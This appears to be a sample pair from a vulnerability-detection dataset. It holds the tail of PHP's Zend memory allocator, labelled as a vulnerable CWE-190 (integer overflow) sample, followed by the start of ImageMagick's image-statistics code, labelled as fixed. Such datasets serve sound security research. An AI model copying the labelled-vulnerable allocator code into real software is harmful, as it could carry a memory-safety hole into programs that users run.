ZEND_API char* ZEND_FASTCALL _estrndup(const char *s, size_t length ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
char *p;
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) _emalloc(length + 1 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memcpy(p, s, length);
p[length] = 0;
return p;
}
ZEND_API char* ZEND_FASTCALL zend_strndup(const char *s, size_t length)
{
char *p;
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) malloc(length + 1);
if (UNEXPECTED(p == NULL)) {
return p;
}
if (EXPECTED(length)) {
memcpy(p, s, length);
}
p[length] = 0;
return p;
}
ZEND_API int zend_set_memory_limit(size_t memory_limit)
{
#if ZEND_MM_LIMIT
AG(mm_heap)->limit = (memory_limit >= ZEND_MM_CHUNK_SIZE) ? memory_limit : ZEND_MM_CHUNK_SIZE;
#endif
return SUCCESS;
}
ZEND_API size_t zend_memory_usage(int real_usage)
{
#if ZEND_MM_STAT
if (real_usage) {
return AG(mm_heap)->real_size;
} else {
size_t usage = AG(mm_heap)->size;
return usage;
}
#endif
return 0;
}
ZEND_API size_t zend_memory_peak_usage(int real_usage)
{
#if ZEND_MM_STAT
if (real_usage) {
return AG(mm_heap)->real_peak;
} else {
return AG(mm_heap)->peak;
}
#endif
return 0;
}
ZEND_API void shutdown_memory_manager(int silent, int full_shutdown)
{
zend_mm_shutdown(AG(mm_heap), full_shutdown, silent);
}
static void alloc_globals_ctor(zend_alloc_globals *alloc_globals)
{
#if ZEND_MM_CUSTOM
char *tmp = getenv("USE_ZEND_ALLOC");
if (tmp && !zend_atoi(tmp, 0)) {
alloc_globals->mm_heap = malloc(sizeof(zend_mm_heap));
memset(alloc_globals->mm_heap, 0, sizeof(zend_mm_heap));
alloc_globals->mm_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_STD;
alloc_globals->mm_heap->custom_heap.std._malloc = malloc;
alloc_globals->mm_heap->custom_heap.std._free = free;
alloc_globals->mm_heap->custom_heap.std._realloc = realloc;
return;
}
#endif
#ifdef MAP_HUGETLB
tmp = getenv("USE_ZEND_ALLOC_HUGE_PAGES");
if (tmp && zend_atoi(tmp, 0)) {
zend_mm_use_huge_pages = 1;
}
#endif
ZEND_TSRMLS_CACHE_UPDATE();
alloc_globals->mm_heap = zend_mm_init();
}
#ifdef ZTS
static void alloc_globals_dtor(zend_alloc_globals *alloc_globals)
{
zend_mm_shutdown(alloc_globals->mm_heap, 1, 1);
}
#endif
ZEND_API void start_memory_manager(void)
{
#ifdef ZTS
ts_allocate_id(&alloc_globals_id, sizeof(zend_alloc_globals), (ts_allocate_ctor) alloc_globals_ctor, (ts_allocate_dtor) alloc_globals_dtor);
#else
alloc_globals_ctor(&alloc_globals);
#endif
#ifndef _WIN32
# if defined(_SC_PAGESIZE)
REAL_PAGE_SIZE = sysconf(_SC_PAGESIZE);
# elif defined(_SC_PAGE_SIZE)
REAL_PAGE_SIZE = sysconf(_SC_PAGE_SIZE);
# endif
#endif
}
ZEND_API zend_mm_heap *zend_mm_set_heap(zend_mm_heap *new_heap)
{
zend_mm_heap *old_heap;
old_heap = AG(mm_heap);
AG(mm_heap) = (zend_mm_heap*)new_heap;
return (zend_mm_heap*)old_heap;
}
ZEND_API zend_mm_heap *zend_mm_get_heap(void)
{
return AG(mm_heap);
}
ZEND_API int zend_mm_is_custom_heap(zend_mm_heap *new_heap)
{
#if ZEND_MM_CUSTOM
return AG(mm_heap)->use_custom_heap;
#else
return 0;
#endif
}
ZEND_API void zend_mm_set_custom_handlers(zend_mm_heap *heap,
void* (*_malloc)(size_t),
void (*_free)(void*),
void* (*_realloc)(void*, size_t))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_STD;
_heap->custom_heap.std._malloc = _malloc;
_heap->custom_heap.std._free = _free;
_heap->custom_heap.std._realloc = _realloc;
#endif
}
ZEND_API void zend_mm_get_custom_handlers(zend_mm_heap *heap,
void* (**_malloc)(size_t),
void (**_free)(void*),
void* (**_realloc)(void*, size_t))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
if (heap->use_custom_heap) {
*_malloc = _heap->custom_heap.std._malloc;
*_free = _heap->custom_heap.std._free;
*_realloc = _heap->custom_heap.std._realloc;
} else {
*_malloc = NULL;
*_free = NULL;
*_realloc = NULL;
}
#else
*_malloc = NULL;
*_free = NULL;
*_realloc = NULL;
#endif
}
#if ZEND_DEBUG
ZEND_API void zend_mm_set_custom_debug_handlers(zend_mm_heap *heap,
void* (*_malloc)(size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC),
void (*_free)(void* ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC),
void* (*_realloc)(void*, size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_DEBUG;
_heap->custom_heap.debug._malloc = _malloc;
_heap->custom_heap.debug._free = _free;
_heap->custom_heap.debug._realloc = _realloc;
#endif
}
#endif
ZEND_API zend_mm_storage *zend_mm_get_storage(zend_mm_heap *heap)
{
#if ZEND_MM_STORAGE
return heap->storage;
#else
return NULL;
#endif
}
ZEND_API zend_mm_heap *zend_mm_startup(void)
{
return zend_mm_init();
}
ZEND_API zend_mm_heap *zend_mm_startup_ex(const zend_mm_handlers *handlers, void *data, size_t data_size)
{
#if ZEND_MM_STORAGE
zend_mm_storage tmp_storage, *storage;
zend_mm_chunk *chunk;
zend_mm_heap *heap;
memcpy((zend_mm_handlers*)&tmp_storage.handlers, handlers, sizeof(zend_mm_handlers));
tmp_storage.data = data;
chunk = (zend_mm_chunk*)handlers->chunk_alloc(&tmp_storage, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(chunk == NULL)) {
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
heap = &chunk->heap_slot;
chunk->heap = heap;
chunk->next = chunk;
chunk->prev = chunk;
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
chunk->num = 0;
chunk->free_map[0] = (Z_L(1) << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->main_chunk = chunk;
heap->cached_chunks = NULL;
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
heap->cached_chunks_count = 0;
heap->avg_chunks_count = 1.0;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = 0;
heap->peak = 0;
#endif
#if ZEND_MM_LIMIT
heap->limit = (Z_L(-1) >> Z_L(1));
heap->overflow = 0;
#endif
#if ZEND_MM_CUSTOM
heap->use_custom_heap = 0;
#endif
heap->storage = &tmp_storage;
heap->huge_list = NULL;
memset(heap->free_slot, 0, sizeof(heap->free_slot));
storage = _zend_mm_alloc(heap, sizeof(zend_mm_storage) + data_size ZEND_FILE_LINE_CC ZEND_FILE_LINE_CC);
if (!storage) {
handlers->chunk_free(&tmp_storage, chunk, ZEND_MM_CHUNK_SIZE);
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
memcpy(storage, &tmp_storage, sizeof(zend_mm_storage));
if (data) {
storage->data = (void*)(((char*)storage + sizeof(zend_mm_storage)));
memcpy(storage->data, data, data_size);
}
heap->storage = storage;
return heap;
#else
return NULL;
#endif
}
static ZEND_COLD ZEND_NORETURN void zend_out_of_memory(void)
{
fprintf(stderr, "Out of memory\n");
exit(1);
}
ZEND_API void * __zend_malloc(size_t len)
{
void *tmp = malloc(len);
if (EXPECTED(tmp)) {
return tmp;
}
zend_out_of_memory();
}
ZEND_API void * __zend_calloc(size_t nmemb, size_t len)
{
void *tmp = _safe_malloc(nmemb, len, 0);
memset(tmp, 0, nmemb * len);
return tmp;
}
ZEND_API void * __zend_realloc(void *p, size_t len)
{
p = realloc(p, len);
if (EXPECTED(p)) {
return p;
}
zend_out_of_memory();
}
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5262_0 |
crossvul-cpp_data_good_4425_0 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% SSSSS TTTTT AAA TTTTT IIIII SSSSS TTTTT IIIII CCCC %
% SS T A A T I SS T I C %
% SSS T AAAAA T I SSS T I C %
% SS T A A T I SS T I C %
% SSSSS T A A T IIIII SSSSS T IIIII CCCC %
% %
% %
% MagickCore Image Statistical Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2019 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
%
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/accelerate-private.h"
#include "magick/animate.h"
#include "magick/animate.h"
#include "magick/blob.h"
#include "magick/blob-private.h"
#include "magick/cache.h"
#include "magick/cache-private.h"
#include "magick/cache-view.h"
#include "magick/client.h"
#include "magick/color.h"
#include "magick/color-private.h"
#include "magick/colorspace.h"
#include "magick/colorspace-private.h"
#include "magick/composite.h"
#include "magick/composite-private.h"
#include "magick/compress.h"
#include "magick/constitute.h"
#include "magick/deprecate.h"
#include "magick/display.h"
#include "magick/draw.h"
#include "magick/enhance.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/gem.h"
#include "magick/geometry.h"
#include "magick/list.h"
#include "magick/image-private.h"
#include "magick/magic.h"
#include "magick/magick.h"
#include "magick/memory_.h"
#include "magick/module.h"
#include "magick/monitor.h"
#include "magick/monitor-private.h"
#include "magick/option.h"
#include "magick/paint.h"
#include "magick/pixel-private.h"
#include "magick/profile.h"
#include "magick/property.h"
#include "magick/quantize.h"
#include "magick/random_.h"
#include "magick/random-private.h"
#include "magick/resource_.h"
#include "magick/segment.h"
#include "magick/semaphore.h"
#include "magick/signature-private.h"
#include "magick/statistic.h"
#include "magick/string_.h"
#include "magick/thread-private.h"
#include "magick/timer.h"
#include "magick/utility.h"
#include "magick/version.h"
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E v a l u a t e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EvaluateImage() applies a value to the image with an arithmetic, relational,
% or logical operator. Use these operations to lighten or darken an image, to
% increase or decrease contrast in an image, or to produce the "negative" of
% an image.
%
% The format of the EvaluateImageChannel method is:
%
% MagickBooleanType EvaluateImage(Image *image,
% const MagickEvaluateOperator op,const double value,
% ExceptionInfo *exception)
% MagickBooleanType EvaluateImages(Image *images,
% const MagickEvaluateOperator op,const double value,
% ExceptionInfo *exception)
% MagickBooleanType EvaluateImageChannel(Image *image,
% const ChannelType channel,const MagickEvaluateOperator op,
% const double value,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o op: A channel op.
%
% o value: the value applied by the operator.
%
% o exception: return any errors or warnings in this structure.
%
*/
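/*
  Usage sketch (added illustration, not part of the original source): given an
  already constituted image and an ExceptionInfo (both assumed to exist), the
  signatures documented above could be exercised like this:
    (void) EvaluateImageChannel(image,RedChannel,MultiplyEvaluateOperator,0.5,
      exception);
    (void) EvaluateImage(image,XorEvaluateOperator,(double) QuantumRange,
      exception);
  The first call halves the red channel; the second flips every channel bit,
  producing a rough negative. The variable names are illustrative only.
*/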
static MagickPixelPacket **DestroyPixelThreadSet(const Image *images,
MagickPixelPacket **pixels)
{
register ssize_t
i;
size_t
rows;
assert(pixels != (MagickPixelPacket **) NULL);
rows=MagickMax(GetImageListLength(images),
(size_t) GetMagickResourceLimit(ThreadResource));
for (i=0; i < (ssize_t) rows; i++)
if (pixels[i] != (MagickPixelPacket *) NULL)
pixels[i]=(MagickPixelPacket *) RelinquishMagickMemory(pixels[i]);
pixels=(MagickPixelPacket **) RelinquishMagickMemory(pixels);
return(pixels);
}
static MagickPixelPacket **AcquirePixelThreadSet(const Image *images)
{
const Image
*next;
MagickPixelPacket
**pixels;
register ssize_t
i,
j;
size_t
columns,
rows;
rows=MagickMax(GetImageListLength(images),
(size_t) GetMagickResourceLimit(ThreadResource));
pixels=(MagickPixelPacket **) AcquireQuantumMemory(rows,sizeof(*pixels));
if (pixels == (MagickPixelPacket **) NULL)
return((MagickPixelPacket **) NULL);
(void) memset(pixels,0,rows*sizeof(*pixels));
columns=GetImageListLength(images);
for (next=images; next != (Image *) NULL; next=next->next)
columns=MagickMax(next->columns,columns);
for (i=0; i < (ssize_t) rows; i++)
{
pixels[i]=(MagickPixelPacket *) AcquireQuantumMemory(columns,
sizeof(**pixels));
if (pixels[i] == (MagickPixelPacket *) NULL)
return(DestroyPixelThreadSet(images,pixels));
for (j=0; j < (ssize_t) columns; j++)
GetMagickPixelPacket(images,&pixels[i][j]);
}
return(pixels);
}
static inline double EvaluateMax(const double x,const double y)
{
if (x > y)
return(x);
return(y);
}
#if defined(__cplusplus) || defined(c_plusplus)
extern "C" {
#endif
static int IntensityCompare(const void *x,const void *y)
{
const MagickPixelPacket
*color_1,
*color_2;
int
intensity;
color_1=(const MagickPixelPacket *) x;
color_2=(const MagickPixelPacket *) y;
intensity=(int) MagickPixelIntensity(color_2)-(int)
MagickPixelIntensity(color_1);
return(intensity);
}
#if defined(__cplusplus) || defined(c_plusplus)
}
#endif
static MagickRealType ApplyEvaluateOperator(RandomInfo *random_info,
const Quantum pixel,const MagickEvaluateOperator op,
const MagickRealType value)
{
MagickRealType
result;
result=0.0;
switch (op)
{
case UndefinedEvaluateOperator:
break;
case AbsEvaluateOperator:
{
result=(MagickRealType) fabs((double) (pixel+value));
break;
}
case AddEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case AddModulusEvaluateOperator:
{
/*
This returns a 'floored modulus' of the addition which is a
positive result. It differs from % or fmod() which returns a
'truncated modulus' result, where floor() is replaced by trunc()
and could return a negative result (which is clipped).
*/
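/*
  Added worked example (illustrative, assuming a Q8 build where QuantumRange
  is 255): pixel=200 and value=100 give 300 - 256*floor(300/256) = 44, while a
  negative sum such as -10 wraps to -10 - 256*(-1) = 246 instead of being
  clipped at 0 as a truncated modulus would leave it.
*/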
result=pixel+value;
result-=(QuantumRange+1.0)*floor((double) result/(QuantumRange+1.0));
break;
}
case AndEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel & (ssize_t) (value+0.5));
break;
}
case CosineEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*(0.5*cos((double) (2.0*MagickPI*
QuantumScale*pixel*value))+0.5));
break;
}
case DivideEvaluateOperator:
{
result=pixel/(value == 0.0 ? 1.0 : value);
break;
}
case ExponentialEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*exp((double) (value*QuantumScale*
pixel)));
break;
}
case GaussianNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
GaussianNoise,value);
break;
}
case ImpulseNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
ImpulseNoise,value);
break;
}
case LaplacianNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
LaplacianNoise,value);
break;
}
case LeftShiftEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel << (ssize_t) (value+0.5));
break;
}
case LogEvaluateOperator:
{
if ((QuantumScale*pixel) >= MagickEpsilon)
result=(MagickRealType) (QuantumRange*log((double) (QuantumScale*value*
pixel+1.0))/log((double) (value+1.0)));
break;
}
case MaxEvaluateOperator:
{
result=(MagickRealType) EvaluateMax((double) pixel,value);
break;
}
case MeanEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case MedianEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case MinEvaluateOperator:
{
result=(MagickRealType) MagickMin((double) pixel,value);
break;
}
case MultiplicativeNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
MultiplicativeGaussianNoise,value);
break;
}
case MultiplyEvaluateOperator:
{
result=(MagickRealType) (value*pixel);
break;
}
case OrEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel | (ssize_t) (value+0.5));
break;
}
case PoissonNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
PoissonNoise,value);
break;
}
case PowEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*pow((double) (QuantumScale*pixel),
(double) value));
break;
}
case RightShiftEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel >> (ssize_t) (value+0.5));
break;
}
case RootMeanSquareEvaluateOperator:
{
result=(MagickRealType) (pixel*pixel+value);
break;
}
case SetEvaluateOperator:
{
result=value;
break;
}
case SineEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*(0.5*sin((double) (2.0*MagickPI*
QuantumScale*pixel*value))+0.5));
break;
}
case SubtractEvaluateOperator:
{
result=(MagickRealType) (pixel-value);
break;
}
case SumEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case ThresholdEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel <= value) ? 0 :
QuantumRange);
break;
}
case ThresholdBlackEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel <= value) ? 0 : pixel);
break;
}
case ThresholdWhiteEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel > value) ? QuantumRange :
pixel);
break;
}
case UniformNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
UniformNoise,value);
break;
}
case XorEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel ^ (ssize_t) (value+0.5));
break;
}
}
return(result);
}
static Image *AcquireImageCanvas(const Image *images,ExceptionInfo *exception)
{
const Image
*p,
*q;
size_t
columns,
number_channels,
rows;
q=images;
columns=images->columns;
rows=images->rows;
number_channels=0;
for (p=images; p != (Image *) NULL; p=p->next)
{
size_t
channels;
channels=3;
if (p->matte != MagickFalse)
channels+=1;
if (p->colorspace == CMYKColorspace)
channels+=1;
if (channels > number_channels)
{
number_channels=channels;
q=p;
}
if (p->columns > columns)
columns=p->columns;
if (p->rows > rows)
rows=p->rows;
}
return(CloneImage(q,columns,rows,MagickTrue,exception));
}
MagickExport MagickBooleanType EvaluateImage(Image *image,
const MagickEvaluateOperator op,const double value,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=EvaluateImageChannel(image,CompositeChannels,op,value,exception);
return(status);
}
MagickExport Image *EvaluateImages(const Image *images,
const MagickEvaluateOperator op,ExceptionInfo *exception)
{
#define EvaluateImageTag "Evaluate/Image"
CacheView
*evaluate_view;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
progress;
MagickPixelPacket
**magick_restrict evaluate_pixels,
zero;
RandomInfo
**magick_restrict random_info;
size_t
number_images;
ssize_t
y;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
unsigned long
key;
#endif
assert(images != (Image *) NULL);
assert(images->signature == MagickCoreSignature);
if (images->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",images->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImageCanvas(images,exception);
if (image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
image=DestroyImage(image);
return((Image *) NULL);
}
evaluate_pixels=AcquirePixelThreadSet(images);
if (evaluate_pixels == (MagickPixelPacket **) NULL)
{
image=DestroyImage(image);
(void) ThrowMagickException(exception,GetMagickModule(),
ResourceLimitError,"MemoryAllocationFailed","`%s'",images->filename);
return((Image *) NULL);
}
/*
Evaluate image pixels.
*/
status=MagickTrue;
progress=0;
number_images=GetImageListLength(images);
GetMagickPixelPacket(images,&zero);
random_info=AcquireRandomInfoThreadSet();
evaluate_view=AcquireAuthenticCacheView(image,exception);
if (op == MedianEvaluateOperator)
{
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,images,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict evaluate_indexes;
register MagickPixelPacket
*evaluate_pixel;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(evaluate_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
evaluate_indexes=GetCacheViewAuthenticIndexQueue(evaluate_view);
evaluate_pixel=evaluate_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) number_images; i++)
evaluate_pixel[i]=zero;
next=images;
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,x,y,1,1,exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
evaluate_pixel[i].red=ApplyEvaluateOperator(random_info[id],
GetPixelRed(p),op,evaluate_pixel[i].red);
evaluate_pixel[i].green=ApplyEvaluateOperator(random_info[id],
GetPixelGreen(p),op,evaluate_pixel[i].green);
evaluate_pixel[i].blue=ApplyEvaluateOperator(random_info[id],
GetPixelBlue(p),op,evaluate_pixel[i].blue);
evaluate_pixel[i].opacity=ApplyEvaluateOperator(random_info[id],
GetPixelAlpha(p),op,evaluate_pixel[i].opacity);
if (image->colorspace == CMYKColorspace)
evaluate_pixel[i].index=ApplyEvaluateOperator(random_info[id],
*indexes,op,evaluate_pixel[i].index);
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
qsort((void *) evaluate_pixel,number_images,sizeof(*evaluate_pixel),
IntensityCompare);
SetPixelRed(q,ClampToQuantum(evaluate_pixel[i/2].red));
SetPixelGreen(q,ClampToQuantum(evaluate_pixel[i/2].green));
SetPixelBlue(q,ClampToQuantum(evaluate_pixel[i/2].blue));
SetPixelAlpha(q,ClampToQuantum(evaluate_pixel[i/2].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(evaluate_indexes+x,ClampToQuantum(
evaluate_pixel[i/2].index));
q++;
}
if (SyncCacheViewAuthenticPixels(evaluate_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp atomic
#endif
progress++;
proceed=SetImageProgress(images,EvaluateImageTag,progress,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
}
else
{
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,images,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict evaluate_indexes;
register ssize_t
i,
x;
register MagickPixelPacket
*evaluate_pixel;
register PixelPacket
*magick_restrict q;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(evaluate_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
evaluate_indexes=GetCacheViewAuthenticIndexQueue(evaluate_view);
evaluate_pixel=evaluate_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
evaluate_pixel[x]=zero;
next=images;
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,
exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red=ApplyEvaluateOperator(random_info[id],
GetPixelRed(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].red);
evaluate_pixel[x].green=ApplyEvaluateOperator(random_info[id],
GetPixelGreen(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].green);
evaluate_pixel[x].blue=ApplyEvaluateOperator(random_info[id],
GetPixelBlue(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].blue);
evaluate_pixel[x].opacity=ApplyEvaluateOperator(random_info[id],
GetPixelAlpha(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].opacity);
if (image->colorspace == CMYKColorspace)
evaluate_pixel[x].index=ApplyEvaluateOperator(random_info[id],
GetPixelIndex(indexes+x),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].index);
p++;
}
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
if (op == MeanEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red/=number_images;
evaluate_pixel[x].green/=number_images;
evaluate_pixel[x].blue/=number_images;
evaluate_pixel[x].opacity/=number_images;
evaluate_pixel[x].index/=number_images;
}
if (op == RootMeanSquareEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red=sqrt((double) evaluate_pixel[x].red/
number_images);
evaluate_pixel[x].green=sqrt((double) evaluate_pixel[x].green/
number_images);
evaluate_pixel[x].blue=sqrt((double) evaluate_pixel[x].blue/
number_images);
evaluate_pixel[x].opacity=sqrt((double) evaluate_pixel[x].opacity/
number_images);
evaluate_pixel[x].index=sqrt((double) evaluate_pixel[x].index/
number_images);
}
if (op == MultiplyEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
j;
for (j=0; j < (ssize_t) (number_images-1); j++)
{
evaluate_pixel[x].red*=(MagickRealType) QuantumScale;
evaluate_pixel[x].green*=(MagickRealType) QuantumScale;
evaluate_pixel[x].blue*=(MagickRealType) QuantumScale;
evaluate_pixel[x].opacity*=(MagickRealType) QuantumScale;
evaluate_pixel[x].index*=(MagickRealType) QuantumScale;
}
}
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,ClampToQuantum(evaluate_pixel[x].red));
SetPixelGreen(q,ClampToQuantum(evaluate_pixel[x].green));
SetPixelBlue(q,ClampToQuantum(evaluate_pixel[x].blue));
SetPixelAlpha(q,ClampToQuantum(evaluate_pixel[x].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(evaluate_indexes+x,ClampToQuantum(
evaluate_pixel[x].index));
q++;
}
if (SyncCacheViewAuthenticPixels(evaluate_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(images,EvaluateImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
}
evaluate_view=DestroyCacheView(evaluate_view);
evaluate_pixels=DestroyPixelThreadSet(images,evaluate_pixels);
random_info=DestroyRandomInfoThreadSet(random_info);
if (status == MagickFalse)
image=DestroyImage(image);
return(image);
}
MagickExport MagickBooleanType EvaluateImageChannel(Image *image,
const ChannelType channel,const MagickEvaluateOperator op,const double value,
ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
RandomInfo
**magick_restrict random_info;
ssize_t
y;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
unsigned long
key;
#endif
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
